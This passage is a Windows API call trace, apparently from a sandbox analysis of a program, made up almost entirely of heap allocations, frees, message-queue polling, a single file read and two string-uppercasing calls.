lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0211.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0211.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0211.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0211.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0211.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0211.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e5020 [0211.721] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0211.721] ReadFile (in: hFile=0x504, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x89d8, lpOverlapped=0x0) returned 1 [0211.723] ReadFile (in: hFile=0x504, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0211.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x89d8) returned 0x3864010 [0211.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e5020 | out: hHeap=0x2af0000) returned 1 [0211.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x89d8) returned 0x2a8a938 [0211.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3864010 | out: hHeap=0x2af0000) returned 1 [0211.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x89d8) returned 0x3864010 [0211.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3864010 | out: hHeap=0x2af0000) returned 1 [0211.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0211.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0211.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0211.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.731] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0211.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0211.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x89d8) returned 0x3864010 [0211.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0211.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x89d8) returned 0x2a93318 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0211.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0211.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0211.734] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0211.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0211.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0211.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0211.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0211.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.735] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0211.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.736] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.736] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0211.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0211.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0211.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0211.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0211.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.737] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 